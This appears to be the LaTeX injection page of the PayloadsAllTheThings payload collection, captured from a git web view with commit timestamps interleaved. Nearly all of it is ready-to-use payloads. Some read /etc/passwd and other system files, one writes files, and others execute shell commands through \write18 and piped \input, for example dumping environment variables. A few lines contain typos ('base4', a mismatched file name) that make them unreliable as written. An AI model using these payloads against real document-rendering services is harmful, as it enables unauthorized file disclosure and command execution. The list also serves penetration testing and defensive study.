PayloadsAllTheThings/LaTeX injection/README.md

73 lines
1.3 KiB
Markdown
Raw Normal View History

# LaTex Injection
## Read file
2018-08-12 21:30:22 +00:00
```bash
\input{/etc/passwd}
\include{password} # load .tex file
```
Read single lined file
2018-08-12 21:30:22 +00:00
```bash
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```
Read multiple lined file
2018-08-12 21:30:22 +00:00
```bash
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
2018-08-12 21:30:22 +00:00
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
```
Read text file, keep the formatting
2018-08-12 21:30:22 +00:00
```bash
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```
## Write file
2018-08-12 21:30:22 +00:00
```bash
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
```
## Command execution
2018-08-12 21:30:22 +00:00
The input of the command will be redirected to stdin, use a temp file to get it.
2018-08-12 21:30:22 +00:00
```bash
\immediate\write18{env > output}
\input{output}
```
2018-08-12 21:30:22 +00:00
If you get any LaTex error, consider using base64 to get the result without bad characters
2018-08-12 21:30:22 +00:00
```bash
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
```
```bash
\input|ls|base4
\input{|"/bin/hostname"}
```
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)